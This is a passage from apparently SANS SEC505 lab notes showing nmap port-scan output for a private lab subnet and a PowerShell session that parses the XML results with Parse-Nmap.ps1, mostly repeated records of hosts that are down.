ttl 64\n\t80/tcp closed http reset ttl 64\n\t110/tcp closed pop3 reset ttl 64\n\t111/tcp open rpcbind syn-ack ttl 64\n\t135/tcp closed msrpc reset ttl 64\n\t139/tcp closed netbios-ssn reset ttl 64\n\t143/tcp closed imap reset ttl 64\n\t443/tcp closed https reset ttl 64\n\t445/tcp closed microsoft-ds reset ttl 64\n\t993/tcp closed imaps reset ttl 64\n\t995/tcp closed pop3s reset ttl 64\n\t1723/tcp closed pptp reset ttl 64\n\t3306/tcp closed mysql reset ttl 64\n\t3389/tcp closed ms-wbt-server reset ttl 64\n\t5900/tcp closed vnc reset ttl 64\n\t8080/tcp closed http-proxy reset ttl 64\n\tMAC Address: 00:05:04:03:02:01 (Naray Information & Communication Enterprise)\n\t\n\tInitiating SYN Stealth Scan at 09:13\n\tScanning 10.0.0.233 [20 ports]\n\tDiscovered open port 445/tcp on 10.0.0.233\n\tDiscovered open port 135/tcp on 10.0.0.233\n\tDiscovered open port 3389/tcp on 10.0.0.233\n\tDiscovered open port 53/tcp on 10.0.0.233\n\tDiscovered open port 139/tcp on 10.0.0.233\n\tCompleted SYN Stealth Scan at 09:13, 0.23s elapsed (20 total ports)\n\tNmap scan report for 10.0.0.233\n\tHost is up, received user-set (0.00s latency).\n\tScanned at 2017-07-10 09:13:23 Pacific Daylight Time for 1s\n\t\n\tPORT STATE SERVICE REASON\n\t21/tcp closed ftp reset ttl 128\n\t22/tcp closed ssh reset ttl 128\n\t23/tcp closed telnet reset ttl 128\n\t25/tcp closed smtp reset ttl 128\n\t53/tcp open domain syn-ack ttl 128\n\t80/tcp closed http reset ttl 128\n\t110/tcp closed pop3 reset ttl 128\n\t111/tcp closed rpcbind reset ttl 128\n\t135/tcp open msrpc syn-ack ttl 128\n\t139/tcp open netbios-ssn syn-ack ttl 128\n\t143/tcp closed imap reset ttl 128\n\t443/tcp closed https reset ttl 128\n\t445/tcp open microsoft-ds syn-ack ttl 128\n\t993/tcp closed imaps reset ttl 128\n\t995/tcp closed pop3s reset ttl 128\n\t1723/tcp closed pptp reset ttl 128\n\t3306/tcp closed mysql reset ttl 128\n\t3389/tcp open ms-wbt-server syn-ack ttl 128\n\t5900/tcp closed vnc reset ttl 128\n\t8080/tcp closed http-proxy reset ttl 128\n\t\n\tRead data files from: C:\\Program Files (x86)\\Nmap\n\tNmap done: 256 IP addresses (7 hosts up) scanned in 6.56 seconds\n\t Raw packets sent: 670 (21.384KB) | Rcvd: 151 (6.072KB)\n\t\n\tPS C:\\Users\\Administrator\\Desktop> \n\t```\n\n - Parsing ```xml``` results using [```Parse-Nmap.ps1```](https://github.com/EnclaveConsulting/SANS-SEC505)\n \n\t```PowerShell\n\tPS C:\\Users\\Administrator> cd .\\Desktop\\SEC505-Scripts\n\tPS C:\\Users\\Administrator\\Desktop\\SEC505-Scripts> cd .\\Day1-PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day1-PowerShell> Import-Module .\\Parse-Nmap.ps1\n ```\n \n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day1-PowerShell> parse-nmap -Path ..\\..\\10.0.0.1.xml -RunStatsOnly\n\t\n\t\n\tFilePath : C:\\Users\\Administrator\\Desktop\\10.0.0.1.xml\n\tFileName : 10.0.0.1.xml\n\tScanner : nmap\n\tProfile :\n\tProfileName :\n\tHint :\n\tScanName :\n\tArguments : \"C:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\" -nvv -Pn --top-ports 20 -oX C:\\\\Users\\\\Administrator\\\\Desktop\\\\10.0.0.1.xml 10.0.0.1/24\n\tOptions :\n\tNmapVersion : 7.50\n\tXmlOutputVersion : 1.04\n\tStartTime : 7/10/2017 9:33:13 AM\n\tFinishedTime : 7/10/2017 9:33:17 AM\n\tElapsedSeconds : 4.16\n\tScanTypes : syn\n\tTcpPorts : 21,22,23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080\n\tUdpPorts :\n\tIpProtocols :\n\tSctpPorts :\n\tVerboseLevel : 2\n\tDebuggingLevel : 0\n\tHostsUp : 8\n\tHostsDown : 248\n\tHostsTotal : 256\n\t\n\t\n\t\n\tPS C:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day1-PowerShell>\n\t```\n \n\t```PowerShell\n\tPS C:\\Users\\Administrator\\Desktop\\SEC505-Scripts\\Day1-PowerShell> parse-nmap -Path ..\\..\\10.0.0.1.xml\n\t\n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.0\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.2\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.3\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.4\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.5\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.6\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.7\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.8\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.9\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.10\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.11\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.12\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.13\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.14\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.15\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.16\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.17\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.18\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.20\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.21\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.22\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.23\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.24\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.25\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.26\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.27\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.28\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.29\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.30\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.31\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.33\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.34\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.35\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.36\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.37\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.38\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.39\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.40\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.41\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.42\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.43\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.44\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.45\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.46\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.47\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.48\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.49\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.50\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.51\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.52\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.54\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.55\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.56\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.57\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.58\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.59\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.60\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.62\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.63\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.64\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.65\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.66\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.67\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.68\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.69\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.70\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.71\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.72\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.73\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.74\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.75\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.76\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.77\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.78\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.79\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.80\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.81\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.82\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.83\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.84\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.85\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.86\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.87\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.88\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.89\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.90\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.91\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.92\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.93\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.94\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.96\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.97\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.98\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.99\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.100\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.101\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.102\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.103\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.104\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.105\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.106\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.107\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.108\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.109\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.110\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.111\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.112\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.113\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.114\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.115\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.116\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.117\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.118\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.119\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.120\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.121\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.122\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.123\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.124\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.125\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.126\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.127\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.128\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.129\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.130\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.131\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.132\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.133\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.134\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.135\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.136\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.137\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.138\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : \n\t\n\tHostName : \n\tFQDN : \n\tStatus : down\n\tIPv4 : 10.0.0.139\n\tIPv6 : \n\tMAC : \n\tPorts : \n\tServices : \n\tOS : \n\tScript : 